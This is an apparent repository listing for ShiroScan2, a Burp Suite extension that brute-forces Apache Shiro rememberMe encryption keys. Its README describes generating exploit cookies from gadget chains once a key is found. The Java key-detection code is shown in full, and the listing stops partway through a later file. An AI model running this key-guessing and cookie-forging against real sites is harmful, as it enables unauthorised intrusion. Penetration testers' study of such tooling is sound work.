├── README.md ├── images ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png ├── 8.png └── 9.png ├── pom.xml ├── src └── main │ ├── java │ └── burp │ │ ├── Application │ │ ├── ShiroCipherKeyExtension │ │ │ ├── ExtensionInterface │ │ │ │ ├── AShiroCipherKeyExtension.java │ │ │ │ └── IShiroCipherKeyExtension.java │ │ │ ├── ExtensionMethod │ │ │ │ └── ShiroCipherKeyScan.java │ │ │ ├── ShiroCipherKey.java │ │ │ └── ShiroCipherKeyThread.java │ │ └── ShiroFingerprintExtension │ │ │ ├── ExtensionInterface │ │ │ ├── AShiroFingerprintExtension.java │ │ │ └── IShiroFingerprintExtension.java │ │ │ ├── ExtensionMethod │ │ │ ├── ShiroFingerprint1.java │ │ │ ├── ShiroFingerprint2.java │ │ │ └── ShiroFingerprint3.java │ │ │ └── ShiroFingerprint.java │ │ ├── Bootstrap │ │ ├── CustomBurpHelpers.java │ │ ├── CustomBurpUrl.java │ │ ├── CustomHelpers.java │ │ ├── DiffPage.java │ │ ├── Encrypt │ │ │ ├── CbcEncrypt.java │ │ │ ├── EncryptInterface.java │ │ │ └── GcmEncrypt.java │ │ ├── GlobalPassiveScanVariableReader.java │ │ ├── GlobalVariableReader.java │ │ └── YamlReader.java │ │ ├── BurpExtender.java │ │ ├── Config.java │ │ ├── ConfigDlg.java │ │ ├── CustomErrorException │ │ ├── DiffPageException.java │ │ └── TaskTimeoutException.java │ │ ├── CustomScanIssue.java │ │ ├── Encrypt.java │ │ ├── Menu.java │ │ ├── Ui │ │ ├── BaseSettingTag.java │ │ ├── ScanQueueTag.java │ │ └── Tags.java │ │ └── Utils.java │ └── resources │ └── config.yml └── target ├── BurpShiroPassiveScan-2.0.0.jar ├── BurpShiroPassiveScan.rar ├── BurpShiroPassiveScan ├── BurpShiroPassiveScan.jar └── resources │ └── config.yml ├── classes ├── burp │ ├── Application │ │ ├── ShiroCipherKeyExtension │ │ │ ├── ExtensionInterface │ │ │ │ ├── AShiroCipherKeyExtension.class │ │ │ │ └── IShiroCipherKeyExtension.class │ │ │ ├── ExtensionMethod │ │ │ │ └── ShiroCipherKeyScan.class │ │ │ ├── ShiroCipherKey.class │ │ │ └── ShiroCipherKeyThread.class │ │ └── ShiroFingerprintExtension │ │ │ ├── ExtensionInterface │ 
│ │ ├── AShiroFingerprintExtension.class │ │ │ └── IShiroFingerprintExtension.class │ │ │ ├── ExtensionMethod │ │ │ ├── ShiroFingerprint1.class │ │ │ ├── ShiroFingerprint2.class │ │ │ └── ShiroFingerprint3.class │ │ │ └── ShiroFingerprint.class │ ├── Bootstrap │ │ ├── CustomBurpHelpers.class │ │ ├── CustomBurpUrl.class │ │ ├── CustomHelpers.class │ │ ├── DiffPage.class │ │ ├── Encrypt │ │ │ ├── CbcEncrypt.class │ │ │ ├── EncryptInterface.class │ │ │ └── GcmEncrypt.class │ │ ├── GlobalPassiveScanVariableReader.class │ │ ├── GlobalVariableReader.class │ │ └── YamlReader.class │ ├── BurpExtender.class │ ├── Config.class │ ├── ConfigDlg$1.class │ ├── ConfigDlg.class │ ├── CustomErrorException │ │ ├── DiffPageException.class │ │ └── TaskTimeoutException.class │ ├── CustomScanIssue.class │ ├── Encrypt.class │ ├── Menu$1.class │ ├── Menu$2.class │ ├── Menu$3.class │ ├── Menu$4.class │ ├── Menu$5.class │ ├── Menu$6.class │ ├── Menu$7.class │ ├── Menu.class │ ├── Ui │ │ ├── BaseSettingTag.class │ │ ├── ScanQueueTag$TablesData.class │ │ ├── ScanQueueTag$URLTable.class │ │ ├── ScanQueueTag.class │ │ └── Tags.class │ ├── Utils$SilentURLStreamHandler.class │ └── Utils.class └── config.yml ├── maven-archiver └── pom.properties └── maven-status └── maven-compiler-plugin └── compile └── default-compile ├── createdFiles.lst └── inputFiles.lst /README.md: -------------------------------------------------------------------------------- 1 | ## ShiroScan2 2 | 基于[BurpShiroPassiveScan](https://github.com/pmiaowu/BurpShiroPassiveScan)项目修改增加了Xray回显链生成,修改的目的很简单,就是当pmiaowu大佬的插件检测出漏洞后,自己生成cookie验证下,进一步利用还得是ShiroAttack这类工具 3 | 4 | ## 编译方法 5 | 参考[BurpShiroPassiveScan](https://github.com/pmiaowu/BurpShiroPassiveScan#%E7%BC%96%E8%AF%91%E6%96%B9%E6%B3%95) 6 | 7 | ## 功能 8 | 在Repeater界面右键 9 | 10 | ![image](https://user-images.githubusercontent.com/48114638/188471796-21712269-03fd-41eb-9a7b-3c7465e85d05.png) 11 | 12 | 点击Config输入key,选择加密模式并保存,支持CBC和GCM两种 13 | 14 | 
![image](https://user-images.githubusercontent.com/48114638/188472111-400968c1-31e3-4735-9b66-7d9717906caf.png) 15 | 16 | 选择利用链,自动生成Cookie 17 | 18 | ![image](https://user-images.githubusercontent.com/48114638/188472561-36eabcb4-105c-4c82-a651-a20c915de351.png) 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/1.png -------------------------------------------------------------------------------- /images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/2.png -------------------------------------------------------------------------------- /images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/3.png -------------------------------------------------------------------------------- /images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/4.png -------------------------------------------------------------------------------- /images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/5.png -------------------------------------------------------------------------------- /images/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/6.png 
-------------------------------------------------------------------------------- /images/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/7.png -------------------------------------------------------------------------------- /images/8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/8.png -------------------------------------------------------------------------------- /images/9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/9.png -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | com.github.pmiaowu 8 | BurpShiroPassiveScan 9 | 2.0.0 10 | 11 | 12 | 13 | 14 | net.portswigger.burp.extender 15 | burp-extender-api 16 | 2.3 17 | 18 | 19 | 20 | 21 | org.yaml 22 | snakeyaml 23 | 1.29 24 | 25 | 26 | 27 | 28 | org.apache.httpcomponents 29 | httpclient 30 | 4.5.13 31 | 32 | 33 | 34 | 35 | org.apache.shiro 36 | shiro-core 37 | 1.2.4 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | org.apache.maven.plugins 46 | maven-compiler-plugin 47 | 3.8.1 48 | 49 | 1.8 50 | 1.8 51 | UTF-8 52 | 53 | 54 | 55 | org.apache.maven.plugins 56 | maven-assembly-plugin 57 | 3.3.0 58 | 59 | 60 | BurpShiroPassiveScan 61 | false 62 | 63 | 64 | burp.BurpExtender 65 | 66 | 67 | 68 | jar-with-dependencies 69 | 70 | 71 | ${project.build.directory}/BurpShiroPassiveScan 72 | 73 | 74 | 75 | 76 | 77 | 78 | make-assembly 79 | package 80 | 81 | single 82 | 83 | 84 | 85 | 86 | 87 | org.apache.maven.plugins 88 | maven-resources-plugin 89 | 3.2.0 90 | 91 | 92 | copy-resources 93 
| package 94 | 95 | copy-resources 96 | 97 | 98 | ${project.build.directory}/BurpShiroPassiveScan/resources 99 | 100 | 101 | src/main/resources 102 | 103 | **/* 104 | 105 | true 106 | 107 | 108 | UTF-8 109 | 110 | 111 | 112 | 113 | 114 | 115 | -------------------------------------------------------------------------------- /src/main/java/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/AShiroCipherKeyExtension.java: --------------------------------------------------------------------------------
package burp.Application.ShiroCipherKeyExtension.ExtensionInterface;

import burp.IHttpRequestResponse;

/**
 * Base class for Shiro cipher-key detection extensions.
 *
 * It stores the result of one detection run: the extension name, the key that
 * was found, the encryption mode it was found with, a found/not-found flag and
 * the HTTP exchange kept as evidence. Every accessor other than
 * {@link #setExtensionName(String)} throws {@link IllegalArgumentException}
 * until a non-empty extension name has been set.
 */
public abstract class AShiroCipherKeyExtension implements IShiroCipherKeyExtension {
    private String name = "";

    // The recovered Shiro key is kept here in plain text for later reporting.
    private String key = "";

    private String mode = "";

    private Boolean keyFound = false;

    private IHttpRequestResponse evidence;

    /**
     * Tells whether a string is null or has zero length.
     */
    private static boolean isMissing(String text) {
        return text == null || text.isEmpty();
    }

    /**
     * Sets the extension name (mandatory).
     *
     * @param value the name; must be neither null nor empty
     * @throws IllegalArgumentException when the name is null or empty
     */
    protected void setExtensionName(String value) {
        if (isMissing(value)) {
            throw new IllegalArgumentException("shiro加密key检测扩展-扩展名称不能为空");
        }
        name = value;
    }

    /**
     * Guard used by every other accessor: an extension that never set its name
     * cannot use the rest of this class.
     *
     * @throws IllegalArgumentException when no name has been set
     */
    private void requireExtensionName() {
        if (isMissing(name)) {
            throw new IllegalArgumentException("请为该shiro加密key检测扩展-设置扩展名称");
        }
    }

    /**
     * @return the extension name
     */
    @Override
    public String getExtensionName() {
        requireExtensionName();
        return name;
    }

    /**
     * Marks this run as having found the Shiro encryption key.
     */
    protected void setShiroCipherKeyExists() {
        requireExtensionName();
        keyFound = true;
    }

    /**
     * @return true when a key was found, false otherwise
     */
    @Override
    public Boolean isShiroCipherKeyExists() {
        requireExtensionName();
        return keyFound;
    }

    /**
     * Records the encryption mode used by the run.
     *
     * @param value the mode name
     */
    protected void setEncryptMethod(String value) {
        requireExtensionName();
        mode = value;
    }

    /**
     * @return the encryption mode, for example cbc or gcm
     */
    @Override
    public String getEncryptMethod() {
        requireExtensionName();
        return mode;
    }

    /**
     * Records the encryption key.
     *
     * @param value the key
     */
    public void setCipherKey(String value) {
        requireExtensionName();
        key = value;
    }

    /**
     * @return the encryption key
     */
    @Override
    public String getCipherKey() {
        requireExtensionName();
        return key;
    }

    /**
     * Stores the HTTP request/response pair that belongs to the finding.
     *
     * @param httpRequestResponse the exchange to keep
     */
    protected void setHttpRequestResponse(IHttpRequestResponse httpRequestResponse) {
        requireExtensionName();
        evidence = httpRequestResponse;
    }

    /**
     * @return the stored HTTP request/response pair
     */
    @Override
    public IHttpRequestResponse getHttpRequestResponse() {
        requireExtensionName();
        return evidence;
    }
}
-------------------------------------------------------------------------------- /src/main/java/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/IShiroCipherKeyExtension.java: -------------------------------------------------------------------------------- 1 | package burp.Application.ShiroCipherKeyExtension.ExtensionInterface; 2 | 3 | import burp.IScanIssue; 4 | import burp.IHttpRequestResponse; 5 | 6 | /** 7 | * shiro加密key扩展的公共接口 8 | * 所有的抽象类都要继承它并实现所有的接口 9 | */ 10 | public interface
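IShiroCipherKeyExtension { 11 | String getExtensionName(); 12 | 13 | Boolean isShiroCipherKeyExists(); 14 | 15 | String getEncryptMethod(); 16 | 17 | String getCipherKey(); 18 | 19 | IHttpRequestResponse getHttpRequestResponse(); 20 | 21 | IScanIssue export(); 22 | 23 | void consoleExport(); 24 | } 25 | -------------------------------------------------------------------------------- /src/main/java/burp/Application/ShiroCipherKeyExtension/ExtensionMethod/ShiroCipherKeyScan.java: --------------------------------------------------------------------------------
package burp.Application.ShiroCipherKeyExtension.ExtensionMethod;

import java.net.URL;
import java.util.Date;
import java.util.List;
import java.io.IOException;
import java.io.PrintWriter;

import org.apache.shiro.subject.SimplePrincipalCollection;

import burp.*;

import burp.Bootstrap.*;
import burp.Bootstrap.Encrypt.EncryptInterface;

import burp.Application.ShiroCipherKeyExtension.ExtensionInterface.AShiroCipherKeyExtension;
import burp.Application.ShiroFingerprintExtension.ShiroFingerprint;

import burp.CustomErrorException.DiffPageException;
import burp.CustomErrorException.TaskTimeoutException;

/**
 * Checks a list of candidate keys against a site already fingerprinted as using Shiro.
 *
 * For each candidate the scan encrypts the bytes produced from an empty
 * {@link SimplePrincipalCollection}, sends them as the remember-me cookie and
 * compares the answer with the fingerprint response (page similarity and the
 * number of remember-me cookies set). A control request encrypted with a key
 * that is known to be wrong must still behave like the fingerprint before the
 * candidate is reported.
 *
 * The constructor runs the whole scan, network requests included, before it returns.
 */
public class ShiroCipherKeyScan extends AShiroCipherKeyExtension {
    // The listing shows a bare line break inside the issue-detail literals, which Java
    // does not allow; presumably an HTML <br/> lost in extraction - confirm against the repository.
    private static final String DETAIL_LINE_BREAK = "<br/>";

    private GlobalVariableReader globalVariableReader;
    private GlobalPassiveScanVariableReader globalPassiveScanVariableReader;

    private IBurpExtenderCallbacks callbacks;
    private IExtensionHelpers helpers;
    private PrintWriter stdout;

    private YamlReader yamlReader;

    private IHttpRequestResponse baseRequestResponse;

    private ShiroFingerprint shiroFingerprint;

    // Candidate keys; iterated as strings by runExtension().
    private List<String> payloads;

    private EncryptInterface encryptClass;

    private Date startDate;

    private Integer maxExecutionTime;

    private CustomBurpHelpers customBurpHelpers;

    private double similarityRatio;

    // Number of responses that failed the similarity comparison so far,
    // and the count at which the scan gives up.
    private int errorNumber = 0;
    private int endErrorNumber = 10;

    private IHttpRequestResponse shiroFingerprintHttpRequestResponse;

    private String rememberMeCookieName;

    private String responseRememberMeCookieValue;

    private String newRequestRememberMeCookieValue;

    /**
     * Stores the collaborators, reads the similarity threshold from the YAML
     * configuration, takes the fingerprint exchange and cookie name/value from
     * {@code shiroFingerprint} and then runs the scan.
     *
     * @param payloads         candidate keys to try; must not be null or empty
     * @param encryptClass     encryption mode implementation used for every request
     * @param startDate        start of the overall task, used for the timeout
     * @param maxExecutionTime timeout in seconds
     * @throws IOException              declared by {@code runExtension()}
     * @throws IllegalArgumentException when there are no payloads
     */
    public ShiroCipherKeyScan(GlobalVariableReader globalVariableReader,
                              GlobalPassiveScanVariableReader globalPassiveScanVariableReader,
                              IBurpExtenderCallbacks callbacks,
                              YamlReader yamlReader,
                              IHttpRequestResponse baseRequestResponse,
                              ShiroFingerprint shiroFingerprint,
                              List<String> payloads,
                              EncryptInterface encryptClass,
                              Date startDate,
                              Integer maxExecutionTime) throws IOException {
        this.globalVariableReader = globalVariableReader;
        this.globalPassiveScanVariableReader = globalPassiveScanVariableReader;

        this.callbacks = callbacks;
        this.helpers = callbacks.getHelpers();
        this.stdout = new PrintWriter(callbacks.getStdout(), true);

        this.yamlReader = yamlReader;
        this.baseRequestResponse = baseRequestResponse;
        this.shiroFingerprint = shiroFingerprint;
        this.payloads = payloads;
        this.encryptClass = encryptClass;
        this.startDate = startDate;
        this.maxExecutionTime = maxExecutionTime;

        this.customBurpHelpers = new CustomBurpHelpers(this.callbacks);

        this.similarityRatio = yamlReader.getDouble("application.shiroCipherKeyExtension.config.similarityRatio");

        // NOTE(review): run() is called three times here; if it is not cached inside
        // ShiroFingerprint, call it once and keep the result - confirm against that class.
        this.shiroFingerprintHttpRequestResponse = this.shiroFingerprint.run().getHttpRequestResponse();

        this.rememberMeCookieName = this.shiroFingerprint.run().getResponseDefaultRememberMeCookieName();
        this.responseRememberMeCookieValue = this.shiroFingerprint.run().getResponseDefaultRememberMeCookieValue();
        this.newRequestRememberMeCookieValue = "";

        this.setExtensionName("ShiroCipherKeyScan");

        this.runExtension();
    }

    /**
     * Tries every candidate key until one is confirmed or a stop condition is met.
     *
     * @throws DiffPageException        after {@code endErrorNumber} dissimilar responses
     * @throws TaskTimeoutException     when the task has run for {@code maxExecutionTime} seconds
     * @throws IllegalArgumentException when there are no payloads
     */
    private void runExtension() throws IOException {
        // A null list is reported the same way as an empty one instead of failing with a NullPointerException.
        if (this.payloads == null || this.payloads.isEmpty()) {
            throw new IllegalArgumentException("shiro加密key检测扩展-要进行爆破的payloads不能为空, 请检查");
        }

        byte[] exp = this.encryptClass.getBytes(new SimplePrincipalCollection());

        for (String key : this.payloads) {
            // The extension has been unloaded: stop all work.
            if (this.globalVariableReader.getBooleanData("isExtensionUnload")) {
                return;
            }

            // Another thread has already found the key.
            if (this.globalPassiveScanVariableReader.getBooleanData("isEndShiroCipherKeyTask")) {
                return;
            }

            // This scan has found the key.
            if (this.isShiroCipherKeyExists()) {
                return;
            }

            // Too many dissimilar responses: per the original author this most likely
            // means a WAF rule is answering, so the remaining keys are not tried.
            if (this.errorNumber >= this.endErrorNumber) {
                throw new DiffPageException("shiro key scan too many errors");
            }

            // Timeout check.
            int startTime = CustomHelpers.getSecondTimestamp(this.startDate);
            int currentTime = CustomHelpers.getSecondTimestamp(new Date());
            int runTime = currentTime - startTime;
            if (runTime >= this.maxExecutionTime) {
                throw new TaskTimeoutException("shiro key scan task timeout");
            }

            this.cipherKeyDetection(key, exp);
        }
    }

    /**
     * Tests one candidate key and records the finding when it is confirmed.
     *
     * @param key candidate key
     * @param exp bytes to encrypt and send as the remember-me cookie
     */
    private void cipherKeyDetection(String key, byte[] exp) {
        int shiroFingerprintCookieRememberMeNumber = this.getHttpCookieRememberMeNumber(this.shiroFingerprintHttpRequestResponse);
        String shiroFingerprintHttpBody = this.customBurpHelpers.getHttpResponseBody(this.shiroFingerprintHttpRequestResponse.getResponse());

        // Request encrypted with the candidate key.
        String correctRememberMe = this.encryptClass.encrypt(key, exp);
        IHttpRequestResponse newHttpRequestResponse1 = this.getNewHttpRequestResponse(correctRememberMe, 3);

        // A request that produced no response proves nothing about the key. It is counted
        // as a failed comparison so that a missing cookie is never read from a missing response.
        if (newHttpRequestResponse1.getResponse() == null) {
            this.errorNumber++;
            return;
        }

        // The candidate response must look like the fingerprint response.
        String newHttpBody1 = this.customBurpHelpers.getHttpResponseBody(newHttpRequestResponse1.getResponse());
        double htmlSimilarityRatio1 = DiffPage.getRatio(shiroFingerprintHttpBody, newHttpBody1);
        if (this.similarityRatio > htmlSimilarityRatio1) {
            this.errorNumber++;
            return;
        }

        // The candidate only passes when fewer remember-me cookies come back than in the fingerprint response.
        int newHttpCookieRememberMeNumber1 = this.getHttpCookieRememberMeNumber(newHttpRequestResponse1);
        if (newHttpCookieRememberMeNumber1 >= shiroFingerprintCookieRememberMeNumber) {
            return;
        }

        // Second check, to cut false positives caused by a WAF: a request encrypted
        // with a key that is certainly wrong must still behave like the fingerprint.
        // Original author's note: the text "errorKey" after AES encryption.
        String errorKey = "U2FsdGVkX19xgIigFNCsuy2aXwtskOnJV8rQkrT9D5Y=";
        String errorRememberMe = this.encryptClass.encrypt(errorKey, exp);
        IHttpRequestResponse newHttpRequestResponse2 = this.getNewHttpRequestResponse(errorRememberMe, 3);

        if (newHttpRequestResponse2.getResponse() == null) {
            this.errorNumber++;
            return;
        }

        String newHttpBody2 = this.customBurpHelpers.getHttpResponseBody(newHttpRequestResponse2.getResponse());
        double htmlSimilarityRatio2 = DiffPage.getRatio(shiroFingerprintHttpBody, newHttpBody2);
        if (this.similarityRatio > htmlSimilarityRatio2) {
            this.errorNumber++;
            return;
        }

        // The control request must set at least as many remember-me cookies as the fingerprint response.
        int newHttpCookieRememberMeNumber2 = this.getHttpCookieRememberMeNumber(newHttpRequestResponse2);
        if (newHttpCookieRememberMeNumber2 < shiroFingerprintCookieRememberMeNumber) {
            return;
        }

        this.setIssuesDetail(newHttpRequestResponse1, key, this.encryptClass.getName(), correctRememberMe);
    }

    /**
     * Counts the response cookies that carry the remember-me name and whose value
     * is either the fingerprint's value or "deleteMe".
     *
     * @param httpRequestResponse exchange whose response is inspected; the response must not be null
     * @return number of matching cookies
     */
    private int getHttpCookieRememberMeNumber(IHttpRequestResponse httpRequestResponse) {
        int number = 0;
        for (ICookie c : this.helpers.analyzeResponse(httpRequestResponse.getResponse()).getCookies()) {
            if (!c.getName().equals(this.rememberMeCookieName)) {
                continue;
            }
            String value = c.getValue();
            if (value.equals(this.responseRememberMeCookieValue) || value.equals("deleteMe")) {
                number++;
            }
        }
        return number;
    }

    /**
     * Sends the base request with the remember-me cookie replaced, retrying while
     * the response is missing or does not resemble the fingerprint response.
     *
     * @param rememberMe         cookie value to send
     * @param remainingRunNumber maximum number of requests to make
     * @return the first response that resembles the fingerprint, else the last one
     *         received; its response may be null when the request failed
     */
    private IHttpRequestResponse getNewHttpRequestResponse(String rememberMe, int remainingRunNumber) {
        IHttpService httpService = this.baseRequestResponse.getHttpService();
        IParameter newParameter = this.helpers.buildParameter(
                this.rememberMeCookieName,
                rememberMe,
                IParameter.PARAM_COOKIE);
        byte[] newRequest = this.helpers.updateParameter(this.baseRequestResponse.getRequest(), newParameter);

        int attemptsLeft = remainingRunNumber;
        while (true) {
            IHttpRequestResponse newHttpRequestResponse = this.callbacks.makeHttpRequest(httpService, newRequest);

            if (attemptsLeft <= 1) {
                return newHttpRequestResponse;
            }
            attemptsLeft--;

            // No response at all: retry instead of passing null to the body reader.
            if (newHttpRequestResponse.getResponse() == null) {
                continue;
            }

            String shiroFingerprintHttpBody = this.customBurpHelpers.getHttpResponseBody(this.shiroFingerprintHttpRequestResponse.getResponse());
            String newHttpBody = this.customBurpHelpers.getHttpResponseBody(newHttpRequestResponse.getResponse());

            double htmlSimilarityRatio = DiffPage.getRatio(shiroFingerprintHttpBody, newHttpBody);
            if (!(this.similarityRatio > htmlSimilarityRatio)) {
                return newHttpRequestResponse;
            }
        }
    }

    /**
     * Records a confirmed finding: found flag, key, encryption mode, evidence
     * exchange and the cookie value that was sent.
     */
    private void setIssuesDetail(
            IHttpRequestResponse httpRequestResponse,
            String key,
            String encryptMethod,
            String correctRememberMe) {
        this.setShiroCipherKeyExists();
        this.setCipherKey(key);
        this.setEncryptMethod(encryptMethod);
        this.setHttpRequestResponse(httpRequestResponse);
        this.setNewRequestRememberMeCookieValue(correctRememberMe);
    }

    private void setNewRequestRememberMeCookieValue(String value) {
        this.newRequestRememberMeCookieValue = value;
    }

    private String getNewRequestRememberMeCookieValue() {
        return this.newRequestRememberMeCookieValue;
    }

    /**
     * Escapes the characters that have a meaning in HTML.
     *
     * @param value any value; rendered with {@link String#valueOf(Object)} first
     * @return the escaped text
     */
    private static String escapeHtml(Object value) {
        String text = String.valueOf(value);
        StringBuilder escaped = new StringBuilder(text.length());
        for (int i = 0; i < text.length(); i++) {
            char ch = text.charAt(i);
            switch (ch) {
                case '&':
                    escaped.append("&amp;");
                    break;
                case '<':
                    escaped.append("&lt;");
                    break;
                case '>':
                    escaped.append("&gt;");
                    break;
                case '"':
                    escaped.append("&quot;");
                    break;
                case '\'':
                    escaped.append("&#39;");
                    break;
                default:
                    escaped.append(ch);
            }
        }
        return escaped.toString();
    }

    /**
     * Builds the Burp scan issue for a confirmed key.
     *
     * @return the issue, or null when no key was found
     */
    @Override
    public IScanIssue export() {
        if (!this.isShiroCipherKeyExists()) {
            return null;
        }

        IHttpRequestResponse newHttpRequestResponse = this.getHttpRequestResponse();
        URL newHttpRequestUrl = this.helpers.analyzeRequest(newHttpRequestResponse).getUrl();

        // Burp renders issue detail as HTML, and the cookie name is taken from the
        // scanned server's response, so every interpolated value is escaped first.
        StringBuilder detail = new StringBuilder();
        detail.append(DETAIL_LINE_BREAK)
                .append("=============ShiroCipherKeyDetail============")
                .append(DETAIL_LINE_BREAK);
        detail.append("ExtensionMethod: ").append(escapeHtml(this.getExtensionName())).append(DETAIL_LINE_BREAK);
        detail.append("EncryptMethod: ").append(escapeHtml(this.encryptClass.getName())).append(DETAIL_LINE_BREAK);
        detail.append("CookieName: ").append(escapeHtml(this.rememberMeCookieName)).append(DETAIL_LINE_BREAK);
        detail.append("CookieValue: ").append(escapeHtml(this.getNewRequestRememberMeCookieValue())).append(DETAIL_LINE_BREAK);
        detail.append("ShiroCipherKey: ").append(escapeHtml(this.getCipherKey())).append(DETAIL_LINE_BREAK);
        detail.append("=====================================").append(DETAIL_LINE_BREAK);

        String shiroCipherKeyIssueName = this.yamlReader.getString("application.shiroCipherKeyExtension.config.issueName");

        return new CustomScanIssue(
                newHttpRequestUrl,
                shiroCipherKeyIssueName,
                0,
                "High",
                "Certain",
                null,
                null,
                detail.toString(),
                null,
                new IHttpRequestResponse[]{newHttpRequestResponse},
                newHttpRequestResponse.getHttpService()
        );
    }

    /**
     * Prints the finding to the extension's standard output; does nothing when no key was found.
     *
     * The output contains the recovered key and a cookie encrypted with it, so the
     * extension output and any saved copy of it hold sensitive assessment data.
     */
    @Override
    public void consoleExport() {
        if (!this.isShiroCipherKeyExists()) {
            return;
        }

        IHttpRequestResponse newHttpRequestResponse = this.getHttpRequestResponse();
        // One analysis of the exchange gives both the URL and the method.
        IRequestInfo newHttpRequestInfo = this.helpers.analyzeRequest(newHttpRequestResponse);
        URL newHttpRequestUrl = newHttpRequestInfo.getUrl();
        String newHttpRequestMethod = newHttpRequestInfo.getMethod();
        int newHttpResponseStatusCode = this.helpers.analyzeResponse(newHttpRequestResponse.getResponse()).getStatusCode();

        this.stdout.println("");
        this.stdout.println("===========shiro加密key详情============");
        this.stdout.println("你好呀~ (≧ω≦*)喵~");
        this.stdout.println("这边检测到有一个站点使用了 shiro框架 喵~");
        this.stdout.println(String.format(
                "注意: 该检测方法, 正确的时候响应包的 %s 会消失, 这表示当前key是正确的",
                this.rememberMeCookieName));
        this.stdout.println(String.format("负责检测的插件: %s", this.getExtensionName()));
        this.stdout.println(String.format("使用的加密方法: %s", this.encryptClass.getName()));
        this.stdout.println(String.format("url: %s", newHttpRequestUrl));
        this.stdout.println(String.format("请求方法: %s", newHttpRequestMethod));
        this.stdout.println(String.format("页面http状态: %d", newHttpResponseStatusCode));
        this.stdout.println(String.format("对应的Cookie键: %s", this.rememberMeCookieName));
        this.stdout.println(String.format("对应的Cookie值: %s", this.getNewRequestRememberMeCookieValue()));
        this.stdout.println(String.format("Shiro加密key: %s", this.getCipherKey()));
        this.stdout.println("详情请查看-Burp Scanner模块-Issue activity界面");
        this.stdout.println("===================================");
        this.stdout.println("");
    }
}
-------------------------------------------------------------------------------- /src/main/java/burp/Application/ShiroCipherKeyExtension/ShiroCipherKey.java: -------------------------------------------------------------------------------- 1 | package burp.Application.ShiroCipherKeyExtension; 2 | 3 | import java.util.Date; 4 | import java.util.List; 5 | import java.io.PrintWriter; 6 | import java.lang.reflect.Constructor; 7 | import java.lang.reflect.InvocationTargetException; 8 | 9 | import burp.Bootstrap.GlobalPassiveScanVariableReader; 10 | import burp.IHttpRequestResponse; 11 | import burp.IBurpExtenderCallbacks; 12 | 13 | import burp.Bootstrap.YamlReader; 14 | import burp.Bootstrap.GlobalVariableReader; 15 | import burp.Bootstrap.Encrypt.CbcEncrypt; 16 | import burp.Bootstrap.Encrypt.GcmEncrypt; 17 | import burp.Bootstrap.Encrypt.EncryptInterface; 18 | 19 | import burp.Application.ShiroFingerprintExtension.ShiroFingerprint; 20 | 21 | import burp.Application.ShiroCipherKeyExtension.ExtensionInterface.IShiroCipherKeyExtension; 22 | 23 | public class ShiroCipherKey implements Runnable { 24 | private GlobalVariableReader globalVariableReader; 25 | private GlobalPassiveScanVariableReader globalPassiveScanVariableReader; 26 | 27 | private IBurpExtenderCallbacks callbacks; 28 | 29 | private YamlReader yamlReader; 30 | 31 | private IHttpRequestResponse baseRequestResponse; 32 | 33 | private ShiroFingerprint shiroFingerprint; 34 | 35 | private String callClassName; 36 | 37 | private List payloadList; 38 | 39 | /** 40 | * 该模块启动日期 41 | */ 42 | private final Date startDate = new Date(); 43 | 44 | /** 45 | * 程序最大执行时间,单位为秒 46 | * 注意: 会根据payload的添加而添加 47 | */ 48 | private final int maxExecutionTime = 60; 49 | 50 | 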
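/**
 * Creates one worker for the cipher key check.
 *
 * Every argument is stored as given; validation happens in run().
 *
 * @param globalVariableReader            shared state, passed through to the scan class
 * @param globalPassiveScanVariableReader per-scan shared state; carries the
 *                                        "isEndShiroCipherKeyTask" stop flag
 * @param callbacks                       Burp callbacks (used here for stderr)
 * @param yamlReader                      configuration reader
 * @param baseRequestResponse             the request/response pair being scanned
 * @param shiroFingerprint                fingerprint result, passed through
 * @param callClassName                   simple name of the scan class to load
 * @param payloadList                     this worker's share of the configured payloads
 */
public ShiroCipherKey(GlobalVariableReader globalVariableReader,
                      GlobalPassiveScanVariableReader globalPassiveScanVariableReader,
                      IBurpExtenderCallbacks callbacks,
                      YamlReader yamlReader,
                      IHttpRequestResponse baseRequestResponse,
                      ShiroFingerprint shiroFingerprint,
                      String callClassName,
                      List payloadList) {
    this.globalVariableReader = globalVariableReader;
    this.globalPassiveScanVariableReader = globalPassiveScanVariableReader;

    this.callbacks = callbacks;

    this.yamlReader = yamlReader;

    this.baseRequestResponse = baseRequestResponse;

    this.shiroFingerprint = shiroFingerprint;

    this.callClassName = callClassName;

    this.payloadList = payloadList;
}

/**
 * Loads the scan class named by callClassName and runs it once per enabled
 * cipher mode (CBC first, then GCM), stopping as soon as any worker has set
 * the shared "isEndShiroCipherKeyTask" flag.
 *
 * Reflection failures are written to Burp's stderr; they do not propagate.
 *
 * @throws IllegalArgumentException if callClassName is empty or the payload
 *                                  list is null or empty
 */
@Override
public void run() {
    if (callClassName == null || callClassName.length() <= 0) {
        throw new IllegalArgumentException("Application.ShiroCipherKeyExtension-请输入要调用的插件名称");
    }

    // A null list is rejected the same way as an empty one instead of
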